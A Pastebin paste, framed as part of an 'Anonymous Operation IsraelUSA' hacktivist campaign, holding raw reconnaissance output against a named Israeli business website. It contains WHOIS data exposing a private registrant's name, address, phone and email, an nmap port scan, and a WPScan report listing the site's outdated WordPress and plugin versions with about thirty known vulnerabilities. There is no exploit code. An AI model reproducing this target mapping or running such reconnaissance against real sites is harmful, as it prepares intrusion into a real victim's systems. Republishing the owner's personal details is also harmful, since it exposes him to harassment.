Advertisement
Guest User

Anonymous Operation IsraelUSA JTSEC full recon #15

a guest
Dec 31st, 2017
2,693
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 324.25 KB | None | 0 0
  1. #######################################################################################################################################
  2. Hostname www.flybox.co.il ISP Unknown
  3. Continent Unknown Flag
  4. US
  5. Country United States Country Code US
  6. Region Unknown Local time 30 Dec 2017 21:45 CST
  7. City Unknown Latitude 37.751
  8. IP Address (IPv6) 2400:cb00:2048:1::681f:4aef Longitude -97.822
  9. #######################################################################################################################################
  10. [i] Scanning Site: https://flybox.co.il
  11.  
  12.  
  13.  
  14. B A S I C I N F O
  15. ====================
  16.  
  17.  
  18. [+] Site Title: Flybox - אטרקציה במרכז לכל המשפחה והחברים! מנהרת רוח הגיעה לישראל
  19. [+] IP address: 104.31.74.239
  20. [+] Web Server: cloudflare
  21. [+] CMS: WordPress
  22. [+] Cloudflare: Detected
  23. [+] Robots File: Found
  24.  
  25. -------------[ contents ]----------------
  26. User-agent: *
  27. Disallow: /wp-admin/
  28. Allow: /wp-admin/admin-ajax.php
  29.  
  30. -----------[end of contents]-------------
  31.  
  32.  
  33.  
  34. W H O I S L O O K U P
  35. ========================
  36.  
  37.  
  38. % The data in the WHOIS database of the .il registry is provided
  39. % by ISOC-IL for information purposes, and to assist persons in
  40. % obtaining information about or related to a domain name
  41. % registration record. ISOC-IL does not guarantee its accuracy.
  42. % By submitting a WHOIS query, you agree that you will use this
  43. % Data only for lawful purposes and that, under no circumstances
  44. % will you use this Data to: (1) allow, enable, or otherwise
  45. % support the transmission of mass unsolicited, commercial
  46. % advertising or solicitations via e-mail (spam);
  47. % or (2) enable high volume, automated, electronic processes that
  48. % apply to ISOC-IL (or its systems).
  49. % ISOC-IL reserves the right to modify these terms at any time.
  50. % By submitting this query, you agree to abide by this policy.
  51.  
  52. query: flybox.co.il
  53.  
  54. reg-name: flybox
  55. domain: flybox.co.il
  56.  
  57. descr: Ofer Bar
  58. descr: Kibutz Hulda
  59. descr: Kibutz Hulda
  60. descr: 11111
  61. descr: Israel
  62. phone: +972 54 3035371
  63. fax-no: +972 9 9574370
  64. admin-c: IS-OB5539-IL
  65. tech-c: IS-ID1078-IL
  66. zone-c: IS-ID1078-IL
  67. nserver: athena.ns.cloudflare.com
  68. nserver: vin.ns.cloudflare.com
  69. validity: 04-09-2019
  70. DNSSEC: unsigned
  71. status: Transfer Locked
  72. changed: domain-registrar AT isoc.org.il 20130904 (Assigned)
  73. changed: domain-registrar AT isoc.org.il 20161012 (Changed)
  74.  
  75. person: Ofer Bar
  76. address: Ofer Bar
  77. address: Kibutz Hulda
  78. address: Kibutz Hulda
  79. address: 11111
  80. address: Israel
  81. phone: +972 54 3035371
  82. fax-no: +972 9 9574370
  83. e-mail: tsahye AT gmail.com
  84. nic-hdl: IS-OB5539-IL
  85. changed: domain-registrar AT isoc.org.il 20130904
  86. changed: Managing Registrar 20150805
  87.  
  88. person: Interspace Domreg
  89. address: Interspace Ltd.
  90. address: P.O.Box 8723
  91. address: Netanya
  92. address: 42505
  93. address: Israel
  94. phone: +972 73 2224444
  95. fax-no: +972 73 2224440
  96. e-mail: domreg AT interspace.net
  97. nic-hdl: IS-ID1078-IL
  98. changed: Managing Registrar 20070110
  99. changed: Managing Registrar 20070319
  100. changed: Managing Registrar 20070909
  101. changed: Managing Registrar 20090514
  102. changed: Managing Registrar 20110720
  103. changed: Managing Registrar 20110720
  104. changed: Managing Registrar 20110721
  105. changed: Managing Registrar 20111128
  106. changed: Managing Registrar 20111128
  107. changed: Managing Registrar 20130924
  108. changed: Managing Registrar 20130924
  109. changed: Managing Registrar 20130924
  110. changed: Managing Registrar 20130924
  111. changed: Managing Registrar 20130924
  112. changed: Managing Registrar 20170518
  113. changed: Managing Registrar 20170716
  114.  
  115. registrar name: InterSpace Ltd
  116. registrar info: http://www.internic.co.il
  117.  
  118. % Rights to the data above are restricted by copyright.
  119.  
  120.  
  121.  
  122.  
  123. G E O I P L O O K U P
  124. =========================
  125.  
  126. [i] IP Address: 104.31.74.239
  127. [i] Country: US
  128. [i] State: N/A
  129. [i] City: N/A
  130. [i] Latitude: 37.750999
  131. [i] Longitude: -97.821999
  132.  
  133.  
  134.  
  135.  
  136. H T T P H E A D E R S
  137. =======================
  138.  
  139.  
  140. [i] HTTP/1.1 301 Moved Permanently
  141. [i] Date: Sun, 31 Dec 2017 03:49:43 GMT
  142. [i] Content-Type: text/html; charset=UTF-8
  143. [i] Connection: close
  144. [i] Set-Cookie: __cfduid=d048dd8f728aacac5c57377105f435c341514692182; expires=Mon, 31-Dec-18 03:49:42 GMT; path=/; domain=.flybox.co.il; HttpOnly
  145. [i] X-Powered-By: PHP/7.0.13
  146. [i] Set-Cookie: PHPSESSID=n8skqve9rvv5lcm3rj6i9l9bk6; expires=Thu, 14-Sep-2023 11:45:31 GMT; Max-Age=180000000; path=/
  147. [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
  148. [i] Cache-Control: no-store, no-cache, must-revalidate
  149. [i] Pragma: no-cache
  150. [i] Set-Cookie: qtrans_front_language=he; expires=Mon, 31-Dec-2018 03:45:31 GMT; Max-Age=31536000; path=/
  151. [i] Location: https://www.flybox.co.il/
  152. [i] Server: cloudflare
  153. [i] CF-RAY: 3d5a453b3ea599e6-EWR
  154. [i] HTTP/1.1 200 OK
  155. [i] Date: Sun, 31 Dec 2017 03:49:44 GMT
  156. [i] Content-Type: text/html; charset=UTF-8
  157. [i] Connection: close
  158. [i] Set-Cookie: __cfduid=dfb1c034c6d2f841166e7b2bc0c56bd481514692183; expires=Mon, 31-Dec-18 03:49:43 GMT; path=/; domain=.flybox.co.il; HttpOnly
  159. [i] X-Powered-By: PHP/7.0.13
  160. [i] Set-Cookie: PHPSESSID=68gdntsnihgeglnt961kd9mjd3; expires=Thu, 14-Sep-2023 11:45:32 GMT; Max-Age=180000000; path=/
  161. [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
  162. [i] Cache-Control: no-store, no-cache, must-revalidate
  163. [i] Pragma: no-cache
  164. [i] Set-Cookie: qtrans_front_language=he; expires=Mon, 31-Dec-2018 03:45:32 GMT; Max-Age=31536000; path=/
  165. [i] Link: <https://www.flybox.co.il/wp-json/>; rel="https://api.w.org/"
  166. [i] Link: <https://www.flybox.co.il/>; rel=shortlink
  167. [i] Access-Control-Allow-Origin: *
  168. [i] Server: cloudflare
  169. [i] CF-RAY: 3d5a45419c650ef7-EWR
  170.  
  171.  
  172.  
  173.  
  174. D N S L O O K U P
  175. ===================
  176.  
  177. flybox.co.il. 3788 IN HINFO "ANY obsoleted" "See draft-ietf-dnsop-refuse-any"
  178.  
  179.  
  180.  
  181.  
  182. S U B N E T C A L C U L A T I O N
  183. ====================================
  184.  
  185. Address = 2400:cb00:2048:1::681f:4aef
  186. Network = 2400:cb00:2048:1::681f:4aef / 128
  187. Netmask = ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
  188. Wildcard Mask = ::
  189. Hosts Bits = 0
  190. Max. Hosts = 0 (2^0 - 1)
  191. Host Range = { 2400:cb00:2048:1::681f:4af0 - 2400:cb00:2048:1::681f:4aef }
  192.  
  193.  
  194.  
  195. N M A P P O R T S C A N
  196. ============================
  197.  
  198.  
  199. Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-31 03:49 UTC
  200. Nmap scan report for flybox.co.il (104.31.75.239)
  201. Host is up (0.0021s latency).
  202. Other addresses for flybox.co.il (not scanned): 104.31.74.239 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef
  203. PORT STATE SERVICE VERSION
  204. 21/tcp filtered ftp
  205. 22/tcp filtered ssh
  206. 23/tcp filtered telnet
  207. 25/tcp filtered smtp
  208. 80/tcp open http Cloudflare nginx
  209. 110/tcp filtered pop3
  210. 143/tcp filtered imap
  211. 443/tcp open ssl/http Cloudflare nginx
  212. 445/tcp filtered microsoft-ds
  213. 3389/tcp filtered ms-wbt-server
  214.  
  215. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  216. Nmap done: 1 IP address (1 host up) scanned in 13.96 seconds
  217. [!] IP Address : 104.31.75.239
  218. [-] Cloudflare detected
  219. [!] Powered By: PHP/7.0.13
  220. [-] Clickjacking protection is not in place.
  221. [!] CMS Detected : WordPress
  222. [?] Would you like to use WPScan? [Y/n] Y
  223. _______________________________________________________________
  224. __ _______ _____
  225. \ \ / / __ \ / ____|
  226. \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
  227. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
  228. \ /\ / | | ____) | (__| (_| | | | |
  229. \/ \/ |_| |_____/ \___|\__,_|_| |_|
  230.  
  231. WordPress Security Scanner by the WPScan Team
  232. Version 2.9.3
  233. Sponsored by Sucuri - https://sucuri.net
  234. @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
  235. _______________________________________________________________
  236.  
  237. [i] The remote host tried to redirect to: https://www.flybox.co.il/
  238. [?] Do you want follow the redirection ? [Y]es [N]o [A]bort, default: [N]Y
  239. [+] URL: https://www.flybox.co.il/
  240. [+] Started: Sat Dec 30 22:51:59 2017
  241.  
  242. [+] robots.txt available under: 'https://www.flybox.co.il/robots.txt'
  243. [+] Interesting entry from robots.txt: https://www.flybox.co.il/wp-admin/admin-ajax.php
  244. [!] The WordPress 'https://www.flybox.co.il/readme.html' file exists exposing a version number
  245. [+] Interesting header: CF-RAY: 3d5a48eaac52473a-EWR
  246. [+] Interesting header: LINK: <https://www.flybox.co.il/wp-json/>; rel="https://api.w.org/"
  247. [+] Interesting header: LINK: <https://www.flybox.co.il/>; rel=shortlink
  248. [+] Interesting header: SERVER: cloudflare
  249. [+] Interesting header: SET-COOKIE: qtrans_front_language=he; expires=Mon, 31-Dec-2018 03:48:01 GMT; Max-Age=31536000; path=/
  250. [+] Interesting header: X-POWERED-BY: PHP/7.0.13
  251. [+] XML-RPC Interface available under: https://www.flybox.co.il/xmlrpc.php
  252.  
  253. [+] WordPress version 4.5.6 (Released on 2017-01-26) identified from meta generator, links opml, stylesheets numbers
  254. [!] 22 vulnerabilities identified from the version number
  255.  
  256. [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
  257. Reference: https://wpvulndb.com/vulnerabilities/8765
  258. Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
  259. Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
  260. Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
  261. Reference: http://seclists.org/oss-sec/2017/q1/563
  262. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
  263. [i] Fixed in: 4.5.7
  264.  
  265. [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
  266. Reference: https://wpvulndb.com/vulnerabilities/8766
  267. Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
  268. Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
  269. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
  270. [i] Fixed in: 4.5.7
  271.  
  272. [!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
  273. Reference: https://wpvulndb.com/vulnerabilities/8768
  274. Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
  275. Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
  276. Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
  277. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
  278. [i] Fixed in: 4.5.7
  279.  
  280. [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
  281. Reference: https://wpvulndb.com/vulnerabilities/8770
  282. Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
  283. Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
  284. Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
  285. Reference: http://seclists.org/oss-sec/2017/q1/562
  286. Reference: https://hackerone.com/reports/153093
  287. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
  288. [i] Fixed in: 4.5.7
  289.  
  290. [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
  291. Reference: https://wpvulndb.com/vulnerabilities/8807
  292. Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
  293. Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
  294. Reference: https://core.trac.wordpress.org/ticket/25239
  295. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
  296.  
  297. [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
  298. Reference: https://wpvulndb.com/vulnerabilities/8815
  299. Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
  300. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  301. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
  302. [i] Fixed in: 4.5.9
  303.  
  304. [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
  305. Reference: https://wpvulndb.com/vulnerabilities/8816
  306. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  307. Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
  308. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
  309. [i] Fixed in: 4.5.9
  310.  
  311. [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
  312. Reference: https://wpvulndb.com/vulnerabilities/8817
  313. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  314. Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
  315. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
  316. [i] Fixed in: 4.5.9
  317.  
  318. [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
  319. Reference: https://wpvulndb.com/vulnerabilities/8818
  320. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  321. Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
  322. Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
  323. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
  324. [i] Fixed in: 4.5.9
  325.  
  326. [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
  327. Reference: https://wpvulndb.com/vulnerabilities/8819
  328. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  329. Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
  330. Reference: https://hackerone.com/reports/203515
  331. Reference: https://hackerone.com/reports/203515
  332. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
  333. [i] Fixed in: 4.5.9
  334.  
  335. [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
  336. Reference: https://wpvulndb.com/vulnerabilities/8820
  337. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  338. Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
  339. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
  340. [i] Fixed in: 4.5.9
  341.  
  342. [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
  343. Reference: https://wpvulndb.com/vulnerabilities/8905
  344. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  345. Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
  346. Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
  347. [i] Fixed in: 4.5.10
  348.  
  349. [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
  350. Reference: https://wpvulndb.com/vulnerabilities/8906
  351. Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
  352. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  353. Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
  354. Reference: https://wpvulndb.com/vulnerabilities/8905
  355. [i] Fixed in: 4.7.5
  356.  
  357. [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
  358. Reference: https://wpvulndb.com/vulnerabilities/8910
  359. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  360. Reference: https://core.trac.wordpress.org/changeset/41398
  361. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
  362. [i] Fixed in: 4.5.10
  363.  
  364. [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
  365. Reference: https://wpvulndb.com/vulnerabilities/8911
  366. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  367. Reference: https://core.trac.wordpress.org/changeset/41457
  368. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
  369. [i] Fixed in: 4.5.10
  370.  
  371. [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
  372. Reference: https://wpvulndb.com/vulnerabilities/8913
  373. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  374. Reference: https://core.trac.wordpress.org/changeset/41448
  375. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
  376. [i] Fixed in: 4.5.10
  377.  
  378. [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
  379. Reference: https://wpvulndb.com/vulnerabilities/8914
  380. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  381. Reference: https://core.trac.wordpress.org/changeset/41395
  382. Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
  383. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
  384. [i] Fixed in: 4.5.10
  385.  
  386. [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
  387. Reference: https://wpvulndb.com/vulnerabilities/8941
  388. Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
  389. Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
  390. Reference: https://twitter.com/ircmaxell/status/923662170092638208
  391. Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
  392. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
  393. [i] Fixed in: 4.5.11
  394.  
  395. [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
  396. Reference: https://wpvulndb.com/vulnerabilities/8966
  397. Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
  398. Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
  399. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
  400. [i] Fixed in: 4.5.12
  401.  
  402. [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
  403. Reference: https://wpvulndb.com/vulnerabilities/8967
  404. Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
  405. Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
  406. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
  407. [i] Fixed in: 4.5.12
  408.  
  409. [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
  410. Reference: https://wpvulndb.com/vulnerabilities/8968
  411. Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
  412. Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
  413. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
  414. [i] Fixed in: 4.5.12
  415.  
  416. [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
  417. Reference: https://wpvulndb.com/vulnerabilities/8969
  418. Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
  419. Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
  420. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
  421. [i] Fixed in: 4.5.12
  422.  
  423. [+] WordPress theme in use: blue-summit-wp-bootstrap - v1.0
  424.  
  425. [+] Name: blue-summit-wp-bootstrap - v1.0
  426. | Location: https://www.flybox.co.il/wp-content/themes/blue-summit-wp-bootstrap/
  427. | Style URL: https://www.flybox.co.il/wp-content/themes/blue-summit-wp-bootstrap/style.css
  428. | Theme Name: Flybox
  429. | Author: Flybox
  430. | Author URI: http://www.flybox.co.il/
  431.  
  432. [+] Enumerating plugins from passive detection ...
  433. | 15 plugins found:
  434.  
  435. [+] Name: accordions - v2.0.8
  436. | Last updated: 2017-11-26T04:13:00.000Z
  437. | Location: https://www.flybox.co.il/wp-content/plugins/accordions/
  438. | Readme: https://www.flybox.co.il/wp-content/plugins/accordions/readme.txt
  439. [!] The version is out of date, the latest version is 2.0.21
  440.  
  441. [+] Name: colorbox - v1.0.0
  442. | Last updated: 2016-12-15T12:02:00.000Z
  443. | Location: https://www.flybox.co.il/wp-content/plugins/colorbox/
  444. | Readme: https://www.flybox.co.il/wp-content/plugins/colorbox/readme.txt
  445. [!] The version is out of date, the latest version is 1.0.5
  446.  
  447. [+] Name: front-end-only-users - v2.9.13
  448. | Last updated: 2017-12-15T23:06:00.000Z
  449. | Location: https://www.flybox.co.il/wp-content/plugins/front-end-only-users/
  450. | Readme: https://www.flybox.co.il/wp-content/plugins/front-end-only-users/readme.txt
  451. [!] The version is out of date, the latest version is 3.1.15
  452.  
  453. [+] Name: new-royalslider
  454. | Location: https://www.flybox.co.il/wp-content/plugins/new-royalslider/
  455.  
  456. [+] Name: popup-builder - v2.3.1
  457. | Last updated: 2017-12-27T14:41:00.000Z
  458. | Location: https://www.flybox.co.il/wp-content/plugins/popup-builder/
  459. | Readme: https://www.flybox.co.il/wp-content/plugins/popup-builder/readme.txt
  460. [!] The version is out of date, the latest version is 2.6.7.1
  461.  
  462. [+] Name: popup-maker - v1.4.20
  463. | Last updated: 2017-08-18T00:49:00.000Z
  464. | Location: https://www.flybox.co.il/wp-content/plugins/popup-maker/
  465. | Readme: https://www.flybox.co.il/wp-content/plugins/popup-maker/readme.txt
  466. [!] The version is out of date, the latest version is 1.6.6
  467.  
  468. [!] Title: Popup Maker <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
  469. Reference: https://wpvulndb.com/vulnerabilities/8878
  470. Reference: https://plugins.trac.wordpress.org/changeset/1697216/#file3
  471. Reference: https://jvn.jp/en/jp/JVN92921024/index.html
  472. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2284
  473. [i] Fixed in: 1.6.5
  474.  
  475. [+] Name: qtranslate-x - v3.4.6.8
  476. | Latest version: 3.4.6.8 (up to date)
  477. | Last updated: 2016-07-13T17:36:00.000Z
  478. | Location: https://www.flybox.co.il/wp-content/plugins/qtranslate-x/
  479. | Readme: https://www.flybox.co.il/wp-content/plugins/qtranslate-x/readme.txt
  480.  
  481. [+] Name: social-popup - v1.8
  482. | Latest version: 1.6.4.5 (up to date)
  483. | Last updated: 2015-05-20T17:06:00.000Z
  484. | Location: https://www.flybox.co.il/wp-content/plugins/social-popup/
  485. | Readme: https://www.flybox.co.il/wp-content/plugins/social-popup/README.txt
  486.  
  487. [+] Name: sogo-accessibility - v1.0.9
  488. | Last updated: 2017-11-09T06:07:00.000Z
  489. | Location: https://www.flybox.co.il/wp-content/plugins/sogo-accessibility/
  490. | Readme: https://www.flybox.co.il/wp-content/plugins/sogo-accessibility/README.txt
  491. [!] The version is out of date, the latest version is 1.2.2
  492.  
  493. [+] Name: superfly-menu
  494. | Location: https://www.flybox.co.il/wp-content/plugins/superfly-menu/
  495.  
  496. [+] Name: woocommerce - v2.5.5
  497. | Last updated: 2017-12-13T16:24:00.000Z
  498. | Location: https://www.flybox.co.il/wp-content/plugins/woocommerce/
  499. | Readme: https://www.flybox.co.il/wp-content/plugins/woocommerce/readme.txt
  500. [!] The version is out of date, the latest version is 3.2.6
  501.  
  502. [!] Title: WooCommerce <= 2.6.2 - Authenticated Cross-Site Scripting (XSS)
  503. Reference: https://wpvulndb.com/vulnerabilities/8563
  504. Reference: https://woocommerce.wordpress.com/2016/07/19/woocommerce-2-6-3-fixsecurity-release-notes/
  505. Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_woocommerce_using_image_metadata__exif_.html
  506. [i] Fixed in: 2.6.3
  507.  
  508. [!] Title: WooCommerce <= 2.6.3 - Stored Cross Site Scripting (XSS) via REST API
  509. Reference: https://wpvulndb.com/vulnerabilities/8619
  510. Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_woocommerce_wordpress_plugin.html
  511. Reference: http://seclists.org/fulldisclosure/2016/Sep/20
  512. Reference: https://hackerone.com/reports/152692
  513. [i] Fixed in: 2.6.4
  514.  
  515. [!] Title: WooCommerce <= 2.6.8 - Authenticated Tax-Rate CSV XSS
  516. Reference: https://wpvulndb.com/vulnerabilities/8710
  517. Reference: https://www.fortiguard.com/advisory/fortinet-discovers-wordpress-woocommerce-plug-in-cross-site-scripting-vulnerability-1
  518. Reference: http://blog.fortinet.com/2016/12/16/woocommerce-tax-rates-cross-site-scripting-vulnerability2
  519. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10112
  520. [i] Fixed in: 2.6.9
  521.  
  522. [+] Name: woocommerce-ajax-add-to-cart-for-variable-products - v1.2.8
  523. | Last updated: 2016-07-18T20:56:00.000Z
  524. | Location: https://www.flybox.co.il/wp-content/plugins/woocommerce-ajax-add-to-cart-for-variable-products/
  525. | Readme: https://www.flybox.co.il/wp-content/plugins/woocommerce-ajax-add-to-cart-for-variable-products/readme.txt
  526. [!] The version is out of date, the latest version is 1.2.9
  527.  
  528. [+] Name: woocommerce-bookings
  529. | Location: https://www.flybox.co.il/wp-content/plugins/woocommerce-bookings/
  530. | Changelog: https://www.flybox.co.il/wp-content/plugins/woocommerce-bookings/changelog.txt
  531.  
  532. [+] Name: wp-facebook-login - v1.1.2
  533. | Last updated: 2017-12-21T21:28:00.000Z
  534. | Location: https://www.flybox.co.il/wp-content/plugins/wp-facebook-login/
  535. | Readme: https://www.flybox.co.il/wp-content/plugins/wp-facebook-login/README.txt
  536. [!] The version is out of date, the latest version is 1.2.2
  537.  
  538. [+] Name: wordpress-seo - v3.2.5
  539. | Last updated: 2017-12-20T08:23:00.000Z
  540. | Location: https://www.flybox.co.il/wp-content/plugins/wordpress-seo/
  541. | Readme: https://www.flybox.co.il/wp-content/plugins/wordpress-seo/readme.txt
  542. | Changelog: https://www.flybox.co.il/wp-content/plugins/wordpress-seo/changelog.txt
  543. [!] The version is out of date, the latest version is 6.0
  544.  
  545. [!] Title: Yoast SEO <= 3.2.5 - Unspecified Cross-Site Scripting (XSS)
  546. Reference: https://wpvulndb.com/vulnerabilities/8569
  547. Reference: https://wordpress.org/plugins/wordpress-seo/changelog/
  548. [i] Fixed in: 3.3.0
  549.  
  550. [!] Title: Yoast SEO <= 3.4.0 - Authenticated Stored Cross-Site Scripting (XSS)
  551. Reference: https://wpvulndb.com/vulnerabilities/8583
  552. Reference: https://plugins.trac.wordpress.org/changeset/1466243/wordpress-seo
  553. [i] Fixed in: 3.4.1
  554.  
  555. [!] Title: Yoast SEO <= 5.7.1 - Unauthenticated Cross-Site Scripting (XSS)
  556. Reference: https://wpvulndb.com/vulnerabilities/8960
  557. Reference: https://plugins.trac.wordpress.org/changeset/1766831/wordpress-seo/trunk/admin/google_search_console/class-gsc-table.php
  558. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16842
  559. [i] Fixed in: 5.8
  560.  
  561. [+] Finished: Sat Dec 30 22:59:22 2017
  562. [+] Requests Done: 432
  563. [+] Memory used: 203.512 MB
  564. [+] Elapsed time: 00:07:22
  565. [+] Honeypot Probabilty: 30%
  566. ----------------------------------------
  567. [+] Robots.txt retrieved
  568. User-agent: *
  569. Disallow: /wp-admin/
  570. Allow: /wp-admin/admin-ajax.php
  571.  
  572. ----------------------------------------
  573. PORT STATE SERVICE VERSION
  574. 21/tcp filtered ftp
  575. 22/tcp filtered ssh
  576. 23/tcp filtered telnet
  577. 25/tcp filtered smtp
  578. 80/tcp open http Cloudflare nginx
  579. 110/tcp filtered pop3
  580. 143/tcp filtered imap
  581. 443/tcp open ssl/https?
  582. 445/tcp filtered microsoft-ds
